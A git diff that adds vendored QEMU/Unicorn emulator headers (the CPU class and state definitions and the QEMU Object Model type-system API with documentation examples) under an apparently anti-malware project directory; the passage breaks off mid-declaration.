+ * @set_pc: Callback for setting the Program Counter register. + * @synchronize_from_tb: Callback for synchronizing state from a TCG + * #TranslationBlock. + * @handle_mmu_fault: Callback for handling an MMU fault. + * @get_phys_page_debug: Callback for obtaining a physical address. + * @debug_excp_handler: Callback for handling debug exceptions. + * @vmsd: State description for migration. + * @cpu_exec_enter: Callback for cpu_exec preparation. + * @cpu_exec_exit: Callback for cpu_exec cleanup. + * @cpu_exec_interrupt: Callback for processing interrupts in cpu_exec. + * + * Represents a CPU family or model. + */ +typedef struct CPUClass { + /*< private >*/ + DeviceClass parent_class; + /*< public >*/ + + ObjectClass *(*class_by_name)(struct uc_struct *uc, const char *cpu_model); + void (*parse_features)(CPUState *cpu, char *str, Error **errp); + + void (*reset)(CPUState *cpu); + int reset_dump_flags; + bool (*has_work)(CPUState *cpu); + void (*do_interrupt)(CPUState *cpu); + CPUUnassignedAccess do_unassigned_access; + void (*do_unaligned_access)(CPUState *cpu, vaddr addr, + int is_write, int is_user, uintptr_t retaddr); + int (*memory_rw_debug)(CPUState *cpu, vaddr addr, + uint8_t *buf, int len, bool is_write); + void (*dump_state)(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + void (*dump_statistics)(CPUState *cpu, FILE *f, + fprintf_function cpu_fprintf, int flags); + int64_t (*get_arch_id)(CPUState *cpu); + bool (*get_paging_enabled)(const CPUState *cpu); + void (*get_memory_mapping)(CPUState *cpu, MemoryMappingList *list, + Error **errp); + void (*set_pc)(CPUState *cpu, vaddr value); + void (*synchronize_from_tb)(CPUState *cpu, struct TranslationBlock *tb); + int (*handle_mmu_fault)(CPUState *cpu, vaddr address, int rw, + int mmu_index); + hwaddr (*get_phys_page_debug)(CPUState *cpu, vaddr addr); + void (*debug_excp_handler)(CPUState *cpu); + + const struct VMStateDescription *vmsd; + + void (*cpu_exec_enter)(CPUState *cpu); + void (*cpu_exec_exit)(CPUState *cpu); + bool (*cpu_exec_interrupt)(CPUState *cpu, int interrupt_request); +} CPUClass; + +#ifdef HOST_WORDS_BIGENDIAN +typedef struct icount_decr_u16 { + uint16_t high; + uint16_t low; +} icount_decr_u16; +#else +typedef struct icount_decr_u16 { + uint16_t low; + uint16_t high; +} icount_decr_u16; +#endif + +typedef struct CPUBreakpoint { + vaddr pc; + int flags; /* BP_* */ + QTAILQ_ENTRY(CPUBreakpoint) entry; +} CPUBreakpoint; + +typedef struct CPUWatchpoint { + vaddr vaddr; + vaddr len; + vaddr hitaddr; + int flags; /* BP_* */ + QTAILQ_ENTRY(CPUWatchpoint) entry; +} CPUWatchpoint; + +struct KVMState; +struct kvm_run; + +#define TB_JMP_CACHE_BITS 12 +#define TB_JMP_CACHE_SIZE (1 << TB_JMP_CACHE_BITS) + +/** + * CPUState: + * @cpu_index: CPU index (informative). + * @nr_cores: Number of cores within this CPU package. + * @nr_threads: Number of threads within this CPU. + * @numa_node: NUMA node this CPU is belonging to. + * @host_tid: Host thread ID. + * @running: #true if CPU is currently running (usermode). + * @created: Indicates whether the CPU thread has been successfully created. + * @interrupt_request: Indicates a pending interrupt request. + * @halted: Nonzero if the CPU is in suspended state. + * @stop: Indicates a pending stop request. + * @stopped: Indicates the CPU has been artificially stopped. + * @tcg_exit_req: Set to force TCG to stop executing linked TBs for this + * CPU and return to its top level loop. + * @singlestep_enabled: Flags for single-stepping. + * @icount_extra: Instructions until next timer event. + * @icount_decr: Number of cycles left, with interrupt flag in high bit. + * This allows a single read-compare-cbranch-write sequence to test + * for both decrementer underflow and exceptions. + * @can_do_io: Nonzero if memory-mapped IO is safe. + * @env_ptr: Pointer to subclass-specific CPUArchState field. + * @current_tb: Currently executing TB. + * @next_cpu: Next CPU sharing TB cache. + * @opaque: User data. + * @mem_io_pc: Host Program Counter at which the memory was accessed. + * @mem_io_vaddr: Target virtual address at which the memory was accessed. + * @kvm_fd: vCPU file descriptor for KVM. + * + * State of one CPU core or thread. + */ +struct CPUState { + /*< private >*/ + DeviceState parent_obj; + /*< public >*/ + + int nr_cores; + int nr_threads; + int numa_node; + + struct QemuThread *thread; +#ifdef _WIN32 + HANDLE hThread; +#endif + int thread_id; + uint32_t host_tid; + bool running; + struct qemu_work_item *queued_work_first, *queued_work_last; + bool thread_kicked; + bool created; + bool stop; + bool stopped; + volatile sig_atomic_t exit_request; + uint32_t interrupt_request; + int singlestep_enabled; + int64_t icount_extra; + sigjmp_buf jmp_env; + + AddressSpace *as; + MemoryListener *tcg_as_listener; + + void *env_ptr; /* CPUArchState */ + struct TranslationBlock *current_tb; + struct TranslationBlock *tb_jmp_cache[TB_JMP_CACHE_SIZE]; + QTAILQ_ENTRY(CPUState) node; + + /* ice debug support */ + QTAILQ_HEAD(breakpoints_head, CPUBreakpoint) breakpoints; + + QTAILQ_HEAD(watchpoints_head, CPUWatchpoint) watchpoints; + CPUWatchpoint *watchpoint_hit; + + void *opaque; + + /* In order to avoid passing too many arguments to the MMIO helpers, + * we store some rarely used information in the CPU context. + */ + uintptr_t mem_io_pc; + vaddr mem_io_vaddr; + + int kvm_fd; + bool kvm_vcpu_dirty; + struct KVMState *kvm_state; + struct kvm_run *kvm_run; + + /* TODO Move common fields from CPUArchState here. */ + int cpu_index; /* used by alpha TCG */ + uint32_t halted; /* used by alpha, cris, ppc TCG */ + union { + uint32_t u32; + icount_decr_u16 u16; + } icount_decr; + uint32_t can_do_io; + int32_t exception_index; /* used by m68k TCG */ + + /* Note that this is accessed at the start of every TB via a negative + offset from AREG0. Leave this field at the end so as to make the + (absolute value) offset as small as possible. This reduces code + size, especially for hosts without large memory offsets. */ + volatile sig_atomic_t tcg_exit_req; + struct uc_struct* uc; +}; + + +/** + * cpu_paging_enabled: + * @cpu: The CPU whose state is to be inspected. + * + * Returns: %true if paging is enabled, %false otherwise. + */ +bool cpu_paging_enabled(const CPUState *cpu); + +/** + * cpu_get_memory_mapping: + * @cpu: The CPU whose memory mappings are to be obtained. + * @list: Where to write the memory mappings to. + * @errp: Pointer for reporting an #Error. + */ +void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp); + +/** + * cpu_write_elf64_note: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf64_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); + +/** + * cpu_write_elf64_qemunote: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf64_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +/** + * cpu_write_elf32_note: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf32_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); + +/** + * cpu_write_elf32_qemunote: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf32_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +/** + * CPUDumpFlags: + * @CPU_DUMP_CODE: + * @CPU_DUMP_FPU: dump FPU register state, not just integer + * @CPU_DUMP_CCOP: dump info about TCG QEMU's condition code optimization state + */ +enum CPUDumpFlags { + CPU_DUMP_CODE = 0x00010000, + CPU_DUMP_FPU = 0x00020000, + CPU_DUMP_CCOP = 0x00040000, +}; + +/** + * cpu_dump_state: + * @cpu: The CPU whose state is to be dumped. + * @f: File to dump to. + * @cpu_fprintf: Function to dump with. + * @flags: Flags what to dump. + * + * Dumps CPU state. + */ +void cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + +/** + * cpu_dump_statistics: + * @cpu: The CPU whose state is to be dumped. + * @f: File to dump to. + * @cpu_fprintf: Function to dump with. + * @flags: Flags what to dump. + * + * Dumps CPU statistics. + */ +void cpu_dump_statistics(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + +#ifndef CONFIG_USER_ONLY +/** + * cpu_get_phys_page_debug: + * @cpu: The CPU to obtain the physical page address for. + * @addr: The virtual address. + * + * Obtains the physical page corresponding to a virtual one. + * Use it only for debugging because no protection checks are done. + * + * Returns: Corresponding physical page address or -1 if no page found. + */ +static inline hwaddr cpu_get_phys_page_debug(CPUState *cpu, vaddr addr) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + return cc->get_phys_page_debug(cpu, addr); +} +#endif + +/** + * cpu_reset: + * @cpu: The CPU whose state is to be reset. + */ +void cpu_reset(CPUState *cpu); + +/** + * cpu_class_by_name: + * @typename: The CPU base type. + * @cpu_model: The model string without any parameters. + * + * Looks up a CPU #ObjectClass matching name @cpu_model. + * + * Returns: A #CPUClass or %NULL if not matching class is found. + */ +ObjectClass *cpu_class_by_name(struct uc_struct *uc, const char *typename_, const char *cpu_model); + +/** + * cpu_generic_init: + * @typename: The CPU base type. + * @cpu_model: The model string including optional parameters. + * + * Instantiates a CPU, processes optional parameters and realizes the CPU. + * + * Returns: A #CPUState or %NULL if an error occurred. + */ +CPUState *cpu_generic_init(struct uc_struct *uc, const char *typename_, const char *cpu_model); + +/** + * cpu_has_work: + * @cpu: The vCPU to check. + * + * Checks whether the CPU has work to do. + * + * Returns: %true if the CPU has work, %false otherwise. + */ +static inline bool cpu_has_work(CPUState *cpu) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + g_assert(cc->has_work); + return cc->has_work(cpu); +} + +/** + * qemu_cpu_kick: + * @cpu: The vCPU to kick. + * + * Kicks @cpu's thread. + */ +void qemu_cpu_kick(CPUState *cpu); + +/** + * cpu_is_stopped: + * @cpu: The CPU to check. + * + * Checks whether the CPU is stopped. + * + * Returns: %true if run state is not running or if artificially stopped; + * %false otherwise. + */ +bool cpu_is_stopped(CPUState *cpu); + +/** + * run_on_cpu: + * @cpu: The vCPU to run on. + * @func: The function to be executed. + * @data: Data to pass to the function. + * + * Schedules the function @func for execution on the vCPU @cpu. + */ +void run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data); + +/** + * async_run_on_cpu: + * @cpu: The vCPU to run on. + * @func: The function to be executed. + * @data: Data to pass to the function. + * + * Schedules the function @func for execution on the vCPU @cpu asynchronously. + */ +void async_run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data); + +/** + * qemu_get_cpu: + * @index: The CPUState@cpu_index value of the CPU to obtain. + * + * Gets a CPU matching @index. + * + * Returns: The CPU or %NULL if there is no matching CPU. + */ +CPUState *qemu_get_cpu(struct uc_struct *uc, int index); + +/** + * cpu_exists: + * @id: Guest-exposed CPU ID to lookup. + * + * Search for CPU with specified ID. + * + * Returns: %true - CPU is found, %false - CPU isn't found. + */ +bool cpu_exists(struct uc_struct* uc, int64_t id); + +#ifndef CONFIG_USER_ONLY + +typedef void (*CPUInterruptHandler)(CPUState *, int); + +extern CPUInterruptHandler cpu_interrupt_handler; + +/** + * cpu_interrupt: + * @cpu: The CPU to set an interrupt on. + * @mask: The interupts to set. + * + * Invokes the interrupt handler. + */ +static inline void cpu_interrupt(CPUState *cpu, int mask) +{ + cpu_interrupt_handler(cpu, mask); +} + +#else /* USER_ONLY */ + +void cpu_interrupt(CPUState *cpu, int mask); + +#endif /* USER_ONLY */ + +#ifdef CONFIG_SOFTMMU +static inline void cpu_unassigned_access(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, + int opaque, unsigned size) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->do_unassigned_access) { + cc->do_unassigned_access(cpu, addr, is_write, is_exec, opaque, size); + } +} + +static inline void cpu_unaligned_access(CPUState *cpu, vaddr addr, + int is_write, int is_user, + uintptr_t retaddr) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + cc->do_unaligned_access(cpu, addr, is_write, is_user, retaddr); +} +#endif + +/** + * cpu_reset_interrupt: + * @cpu: The CPU to clear the interrupt on. + * @mask: The interrupt mask to clear. + * + * Resets interrupts on the vCPU @cpu. + */ +void cpu_reset_interrupt(CPUState *cpu, int mask); + +/** + * cpu_exit: + * @cpu: The CPU to exit. + * + * Requests the CPU @cpu to exit execution. + */ +void cpu_exit(CPUState *cpu); + +/** + * cpu_resume: + * @cpu: The CPU to resume. + * + * Resumes CPU, i.e. puts CPU into runnable state. + */ +void cpu_resume(CPUState *cpu); + +/** + * qemu_init_vcpu: + * @cpu: The vCPU to initialize. + * + * Initializes a vCPU. + */ +int qemu_init_vcpu(CPUState *cpu); + +#define SSTEP_ENABLE 0x1 /* Enable simulated HW single stepping */ +#define SSTEP_NOIRQ 0x2 /* Do not use IRQ while single stepping */ +#define SSTEP_NOTIMER 0x4 /* Do not Timers while single stepping */ + +/** + * cpu_single_step: + * @cpu: CPU to the flags for. + * @enabled: Flags to enable. + * + * Enables or disables single-stepping for @cpu. + */ +void cpu_single_step(CPUState *cpu, int enabled); + +/* Breakpoint/watchpoint flags */ +#define BP_MEM_READ 0x01 +#define BP_MEM_WRITE 0x02 +#define BP_MEM_ACCESS (BP_MEM_READ | BP_MEM_WRITE) +#define BP_STOP_BEFORE_ACCESS 0x04 +/* 0x08 currently unused */ +#define BP_GDB 0x10 +#define BP_CPU 0x20 +#define BP_WATCHPOINT_HIT_READ 0x40 +#define BP_WATCHPOINT_HIT_WRITE 0x80 +#define BP_WATCHPOINT_HIT (BP_WATCHPOINT_HIT_READ | BP_WATCHPOINT_HIT_WRITE) + +int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, + CPUBreakpoint **breakpoint); +int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags); +void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint); +void cpu_breakpoint_remove_all(CPUState *cpu, int mask); + +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint); +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, + vaddr len, int flags); +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint); +void cpu_watchpoint_remove_all(CPUState *cpu, int mask); + +void QEMU_NORETURN cpu_abort(CPUState *cpu, const char *fmt, ...) + GCC_FMT_ATTR(2, 3); + +void cpu_register_types(struct uc_struct *uc); + +#ifdef CONFIG_SOFTMMU +extern const struct VMStateDescription vmstate_cpu_common; +#else +#define vmstate_cpu_common vmstate_dummy +#endif + +#define VMSTATE_CPU() { \ + .name = "parent_obj", \ + .size = sizeof(CPUState), \ + .vmsd = &vmstate_cpu_common, \ + .flags = VMS_STRUCT, \ + .offset = 0, \ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h new file mode 100644 index 0000000..c3a1ffe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h @@ -0,0 +1,1270 @@ +/* + * QEMU Object Model + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef QEMU_OBJECT_H +#define QEMU_OBJECT_H + +#include "glib_compat.h" +#include "unicorn/platform.h" +#include "qemu/queue.h" +#include "qapi/error.h" + +struct Visitor; + +struct TypeImpl; +typedef struct TypeImpl *Type; + +typedef struct ObjectClass ObjectClass; +typedef struct Object Object; + +typedef struct TypeInfo TypeInfo; + +typedef struct InterfaceClass InterfaceClass; +typedef struct InterfaceInfo InterfaceInfo; + +struct uc_struct; + +#define TYPE_OBJECT "object" + +/** + * SECTION:object.h + * @title:Base Object Type System + * @short_description: interfaces for creating new types and objects + * + * The QEMU Object Model provides a framework for registering user creatable + * types and instantiating objects from those types. QOM provides the following + * features: + * + * - System for dynamically registering types + * - Support for single-inheritance of types + * - Multiple inheritance of stateless interfaces + * + * <example> + * <title>Creating a minimal type + * + * #include "qdev.h" + * + * #define TYPE_MY_DEVICE "my-device" + * + * // No new virtual functions: we can reuse the typedef for the + * // superclass. + * typedef DeviceClass MyDeviceClass; + * typedef struct MyDevice + * { + * DeviceState parent; + * + * int reg0, reg1, reg2; + * } MyDevice; + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * }; + * + * static void my_device_register_types(void) + * { + * type_register_static(&my_device_info); + * } + * + * type_init(my_device_register_types) + * + * + * + * In the above example, we create a simple type that is described by #TypeInfo. + * #TypeInfo describes information about the type including what it inherits + * from, the instance and class size, and constructor/destructor hooks. + * + * Every type has an #ObjectClass associated with it. #ObjectClass derivatives + * are instantiated dynamically but there is only ever one instance for any + * given type. The #ObjectClass typically holds a table of function pointers + * for the virtual methods implemented by this type. + * + * Using object_new(), a new #Object derivative will be instantiated. You can + * cast an #Object to a subclass (or base-class) type using + * object_dynamic_cast(). You typically want to define macro wrappers around + * OBJECT_CHECK() and OBJECT_CLASS_CHECK() to make it easier to convert to a + * specific type: + * + * + * Typecasting macros + * + * #define MY_DEVICE_GET_CLASS(obj) \ + * OBJECT_GET_CLASS(MyDeviceClass, obj, TYPE_MY_DEVICE) + * #define MY_DEVICE_CLASS(klass) \ + * OBJECT_CLASS_CHECK(MyDeviceClass, klass, TYPE_MY_DEVICE) + * #define MY_DEVICE(obj) \ + * OBJECT_CHECK(MyDevice, obj, TYPE_MY_DEVICE) + * + * + * + * # Class Initialization # + * + * Before an object is initialized, the class for the object must be + * initialized. There is only one class object for all instance objects + * that is created lazily. + * + * Classes are initialized by first initializing any parent classes (if + * necessary). After the parent class object has initialized, it will be + * copied into the current class object and any additional storage in the + * class object is zero filled. + * + * The effect of this is that classes automatically inherit any virtual + * function pointers that the parent class has already initialized. All + * other fields will be zero filled. + * + * Once all of the parent classes have been initialized, #TypeInfo::class_init + * is called to let the class being instantiated provide default initialize for + * its virtual functions. Here is how the above example might be modified + * to introduce an overridden virtual function: + * + * + * Overriding a virtual function + * + * #include "qdev.h" + * + * void my_device_class_init(ObjectClass *klass, void *class_data) + * { + * DeviceClass *dc = DEVICE_CLASS(klass); + * dc->reset = my_device_reset; + * } + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * .class_init = my_device_class_init, + * }; + * + * + * + * Introducing new virtual methods requires a class to define its own + * struct and to add a .class_size member to the #TypeInfo. Each method + * will also have a wrapper function to call it easily: + * + * + * Defining an abstract class + * + * #include "qdev.h" + * + * typedef struct MyDeviceClass + * { + * DeviceClass parent; + * + * void (*frobnicate) (MyDevice *obj); + * } MyDeviceClass; + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * .abstract = true, // or set a default in my_device_class_init + * .class_size = sizeof(MyDeviceClass), + * }; + * + * void my_device_frobnicate(MyDevice *obj) + * { + * MyDeviceClass *klass = MY_DEVICE_GET_CLASS(obj); + * + * klass->frobnicate(obj); + * } + * + * + * + * # Interfaces # + * + * Interfaces allow a limited form of multiple inheritance. Instances are + * similar to normal types except for the fact that are only defined by + * their classes and never carry any state. You can dynamically cast an object + * to one of its #Interface types and vice versa. + * + * # Methods # + * + * A method is a function within the namespace scope of + * a class. It usually operates on the object instance by passing it as a + * strongly-typed first argument. + * If it does not operate on an object instance, it is dubbed + * class method. + * + * Methods cannot be overloaded. That is, the #ObjectClass and method name + * uniquely identity the function to be called; the signature does not vary + * except for trailing varargs. + * + * Methods are always virtual. Overriding a method in + * #TypeInfo.class_init of a subclass leads to any user of the class obtained + * via OBJECT_GET_CLASS() accessing the overridden function. + * The original function is not automatically invoked. It is the responsibility + * of the overriding class to determine whether and when to invoke the method + * being overridden. + * + * To invoke the method being overridden, the preferred solution is to store + * the original value in the overriding class before overriding the method. + * This corresponds to |[ {super,base}.method(...) ]| in Java and C# + * respectively; this frees the overriding class from hardcoding its parent + * class, which someone might choose to change at some point. + * + * + * Overriding a virtual method + * + * typedef struct MyState MyState; + * + * typedef void (*MyDoSomething)(MyState *obj); + * + * typedef struct MyClass { + * ObjectClass parent_class; + * + * MyDoSomething do_something; + * } MyClass; + * + * static void my_do_something(MyState *obj) + * { + * // do something + * } + * + * static void my_class_init(ObjectClass *oc, void *data) + * { + * MyClass *mc = MY_CLASS(oc); + * + * mc->do_something = my_do_something; + * } + * + * static const TypeInfo my_type_info = { + * .name = TYPE_MY, + * .parent = TYPE_OBJECT, + * .instance_size = sizeof(MyState), + * .class_size = sizeof(MyClass), + * .class_init = my_class_init, + * }; + * + * typedef struct DerivedClass { + * MyClass parent_class; + * + * MyDoSomething parent_do_something; + * } DerivedClass; + * + * static void derived_do_something(MyState *obj) + * { + * DerivedClass *dc = DERIVED_GET_CLASS(obj); + * + * // do something here + * dc->parent_do_something(obj); + * // do something else here + * } + * + * static void derived_class_init(ObjectClass *oc, void *data) + * { + * MyClass *mc = MY_CLASS(oc); + * DerivedClass *dc = DERIVED_CLASS(oc); + * + * dc->parent_do_something = mc->do_something; + * mc->do_something = derived_do_something; + * } + * + * static const TypeInfo derived_type_info = { + * .name = TYPE_DERIVED, + * .parent = TYPE_MY, + * .class_size = sizeof(DerivedClass), + * .class_init = my_class_init, + * }; + * + * + * + * Alternatively, object_class_by_name() can be used to obtain the class and + * its non-overridden methods for a specific type. This would correspond to + * |[ MyClass::method(...) ]| in C++. + * + * The first example of such a QOM method was #CPUClass.reset, + * another example is #DeviceClass.realize. + */ + + +/** + * ObjectPropertyAccessor: + * @obj: the object that owns the property + * @v: the visitor that contains the property data + * @opaque: the object property opaque + * @name: the name of the property + * @errp: a pointer to an Error that is filled if getting/setting fails. + * + * Called when trying to get/set a property. + */ +typedef void (ObjectPropertyAccessor)(struct uc_struct *uc, Object *obj, + struct Visitor *v, + void *opaque, + const char *name, + Error **errp); +typedef int (ObjectPropertySetAccessor)(struct uc_struct *uc, Object *obj, + struct Visitor *v, + void *opaque, + const char *name, + Error **errp); + +/** + * ObjectPropertyResolve: + * @obj: the object that owns the property + * @opaque: the opaque registered with the property + * @part: the name of the property + * + * Resolves the #Object corresponding to property @part. + * + * The returned object can also be used as a starting point + * to resolve a relative path starting with "@part". + * + * Returns: If @path is the path that led to @obj, the function + * returns the #Object corresponding to "@path/@part". + * If "@path/@part" is not a valid object path, it returns #NULL. + */ +typedef Object *(ObjectPropertyResolve)(struct uc_struct *uc, Object *obj, + void *opaque, + const char *part); + +/** + * ObjectPropertyRelease: + * @obj: the object that owns the property + * @name: the name of the property + * @opaque: the opaque registered with the property + * + * Called when a property is removed from a object. + */ +typedef void (ObjectPropertyRelease)(struct uc_struct *uc, Object *obj, + const char *name, + void *opaque); + +typedef struct ObjectProperty +{ + gchar *name; + gchar *type; + gchar *description; + ObjectPropertyAccessor *get; + ObjectPropertySetAccessor *set; + ObjectPropertyResolve *resolve; + ObjectPropertyRelease *release; + void *opaque; + + QTAILQ_ENTRY(ObjectProperty) node; +} ObjectProperty; + +/** + * ObjectUnparent: + * @obj: the object that is being removed from the composition tree + * + * Called when an object is being removed from the QOM composition tree. + * The function should remove any backlinks from children objects to @obj. + */ +typedef void (ObjectUnparent)(struct uc_struct *uc, Object *obj); + +/** + * ObjectFree: + * @obj: the object being freed + * + * Called when an object's last reference is removed. + */ +typedef void (ObjectFree)(void *obj); + +#define OBJECT_CLASS_CAST_CACHE 4 + +/** + * ObjectClass: + * + * The base for all classes. The only thing that #ObjectClass contains is an + * integer type handle. + */ +struct ObjectClass +{ + /*< private >*/ + Type type; + GSList *interfaces; + + const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE]; + const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE]; + + ObjectUnparent *unparent; +}; + +/** + * Object: + * + * The base for all objects. The first member of this object is a pointer to + * a #ObjectClass. Since C guarantees that the first member of a structure + * always begins at byte 0 of that structure, as long as any sub-object places + * its parent as the first member, we can cast directly to a #Object. + * + * As a result, #Object contains a reference to the objects type as its + * first member. This allows identification of the real type of the object at + * run time. + * + * #Object also contains a list of #Interfaces that this object + * implements. + */ +struct Object +{ + /*< private >*/ + ObjectClass *class_; + ObjectFree *free; + QTAILQ_HEAD(, ObjectProperty) properties; + uint32_t ref; + Object *parent; +}; + +/** + * TypeInfo: + * @name: The name of the type. + * @parent: The name of the parent type. + * @instance_size: The size of the object (derivative of #Object). If + * @instance_size is 0, then the size of the object will be the size of the + * parent object. + * @instance_init: This function is called to initialize an object. The parent + * class will have already been initialized so the type is only responsible + * for initializing its own members. + * @instance_post_init: This function is called to finish initialization of + * an object, after all @instance_init functions were called. + * @instance_finalize: This function is called during object destruction. This + * is called before the parent @instance_finalize function has been called. + * An object should only free the members that are unique to its type in this + * function. + * @abstract: If this field is true, then the class is considered abstract and + * cannot be directly instantiated. + * @class_size: The size of the class object (derivative of #ObjectClass) + * for this object. If @class_size is 0, then the size of the class will be + * assumed to be the size of the parent class. This allows a type to avoid + * implementing an explicit class type if they are not adding additional + * virtual functions. + * @class_init: This function is called after all parent class initialization + * has occurred to allow a class to set its default virtual method pointers. + * This is also the function to use to override virtual methods from a parent + * class. + * @class_base_init: This function is called for all base classes after all + * parent class initialization has occurred, but before the class itself + * is initialized. This is the function to use to undo the effects of + * memcpy from the parent class to the descendents. + * @class_finalize: This function is called during class destruction and is + * meant to release and dynamic parameters allocated by @class_init. + * @class_data: Data to pass to the @class_init, @class_base_init and + * @class_finalize functions. This can be useful when building dynamic + * classes. + * @interfaces: The list of interfaces associated with this type. This + * should point to a static array that's terminated with a zero filled + * element. + */ +struct TypeInfo +{ + const char *name; + const char *parent; + + size_t class_size; + size_t instance_size; + void *instance_userdata; + + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); + void (*instance_post_init)(struct uc_struct *uc, Object *obj); + void (*instance_finalize)(struct uc_struct *uc, Object *obj, void *opaque); + + void *class_data; + + void (*class_init)(struct uc_struct *uc, ObjectClass *klass, void *data); + void (*class_base_init)(ObjectClass *klass, void *data); + void (*class_finalize)(ObjectClass *klass, void *data); + + bool abstract; + + void *parent_type; + ObjectClass *class_; + + InterfaceInfo *interfaces; +}; + +/** + * OBJECT: + * @obj: A derivative of #Object + * + * Converts an object to a #Object. Since all objects are #Objects, + * this function will always succeed. + */ +#define OBJECT(obj) \ + ((Object *)(obj)) + +/** + * OBJECT_CLASS: + * @class: A derivative of #ObjectClass. + * + * Converts a class to an #ObjectClass. Since all objects are #Objects, + * this function will always succeed. + */ +#define OBJECT_CLASS(class) \ + ((ObjectClass *)(class)) + +/** + * OBJECT_CHECK: + * @type: The C type to use for the return value. + * @obj: A derivative of @type to cast. + * @name: The QOM typename of @type + * + * A type safe version of @object_dynamic_cast_assert. Typically each class + * will define a macro based on this type to perform type safe dynamic_casts to + * this object type. + * + * If an invalid object is passed to this function, a run time assert will be + * generated. + */ +#define OBJECT_CHECK(uc, type, obj, name) \ + ((type *)object_dynamic_cast_assert(uc, OBJECT(obj), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * OBJECT_CLASS_CHECK: + * @class: The C type to use for the return value. + * @obj: A derivative of @type to cast. + * @name: the QOM typename of @class. + * + * A type safe version of @object_class_dynamic_cast_assert. This macro is + * typically wrapped by each type to perform type safe casts of a class to a + * specific class type. + */ +#define OBJECT_CLASS_CHECK(uc, class, obj, name) \ + ((class *)object_class_dynamic_cast_assert(uc, OBJECT_CLASS(obj), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * OBJECT_GET_CLASS: + * @class: The C type to use for the return value. + * @obj: The object to obtain the class for. + * @name: The QOM typename of @obj. + * + * This function will return a specific class for a given object. Its generally + * used by each type to provide a type safe macro to get a specific class type + * from an object. + */ +#define OBJECT_GET_CLASS(uc, class, obj, name) \ + OBJECT_CLASS_CHECK(uc, class, object_get_class(OBJECT(obj)), name) + +/** + * InterfaceInfo: + * @type: The name of the interface. + * + * The information associated with an interface. + */ +struct InterfaceInfo { + const char *type; +}; + +/** + * InterfaceClass: + * @parent_class: the base class + * + * The class for all interfaces. Subclasses of this class should only add + * virtual methods. + */ +struct InterfaceClass +{ + ObjectClass parent_class; + /*< private >*/ + ObjectClass *concrete_class; + Type interface_type; +}; + +#define TYPE_INTERFACE "interface" + +/** + * INTERFACE_CLASS: + * @klass: class to cast from + * Returns: An #InterfaceClass or raise an error if cast is invalid + */ +#define INTERFACE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, InterfaceClass, klass, TYPE_INTERFACE) + +/** + * INTERFACE_CHECK: + * @interface: the type to return + * @obj: the object to convert to an interface + * @name: the interface type name + * + * Returns: @obj casted to @interface if cast is valid, otherwise raise error. + */ +#define INTERFACE_CHECK(uc, interface, obj, name) \ + ((interface *)object_dynamic_cast_assert(uc, OBJECT((obj)), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * object_new: + * @typename: The name of the type of the object to instantiate. + * + * This function will initialize a new object using heap allocated memory. + * The returned object has a reference count of 1, and will be freed when + * the last reference is dropped. + * + * Returns: The newly allocated and instantiated object. + */ +Object *object_new(struct uc_struct *, const char *typename_); + +/** + * object_initialize: + * @obj: A pointer to the memory to be used for the object. + * @size: The maximum size available at @obj for the object. + * @typename: The name of the type of the object to instantiate. + * + * This function will initialize an object. The memory for the object should + * have already been allocated. The returned object has a reference count of 1, + * and will be finalized when the last reference is dropped. + */ +void object_initialize(struct uc_struct *uc, void *obj, 